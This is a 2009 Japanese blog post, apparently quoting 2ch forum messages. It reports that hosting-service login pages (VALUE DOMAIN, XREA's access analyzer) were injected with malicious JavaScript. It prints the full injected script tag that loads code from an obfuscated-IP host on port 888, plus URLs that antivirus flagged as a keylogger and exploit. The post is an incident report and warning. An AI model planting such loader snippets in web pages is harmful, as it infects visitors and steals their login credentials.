http://d.hatena.ne.jp/strange/20090707#p1より
http://www.mudaijp.com/wp/5596.html
VALUE DOMAINのHPの一部のページにウイルスが仕込まれてるようです。
ウイルスコードが仕込まれているページは、VALUE DOMAINのログイン画面です。
ウイルスコードはjavascriptに記述されている以下のjsを呼び出している。
http://1856317799:888/s.js
このjs中で
http:\/\/0x6EA52967:888/dir/show.php ↓ http://110.135.41.103:888/dir/show.php
さらにこういう香港割り当てのURLを呼び出しており、カスペルスキーだとキーロガーとして検出されるらしい。
VALUE DOMAINは公私ともに使いまくってるのでjavascript切って確認しにいったけど今はもう削除されてるようで見当たらなかった。
しかし、今度はアクセスアナライザーのログイン画面に
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/511-514
511 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:01:49 P
あ、関係ないかもしれないけど、
今XREAのアクセスアナライザー ttp://ax.xrea.com/
のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない?
512 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:03:09 0
>>511
ある! 同じjsが
513 :名無しさん@お腹いっぱい。:2009/07/08(水) 16:04:14 0
うわ!マジで居る
見に行くならスクリプト切っていけよ
俺もjavascript切って見に行ってみたら・・・
<SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement('script'); js.src ="http://1856317799:888/jp.js"; try {document.getElementsByTagName('head')[0].appendChild(js);} catch(exp){} js = null; </SCRIPT>
ある!!!
/dir2/go.jpg
こいつをirvineでダウンロード、terapadで開いてみると案の定jpgに偽装されたファイルが出てきた。
カスペルスキーでスキャンすると
ドン!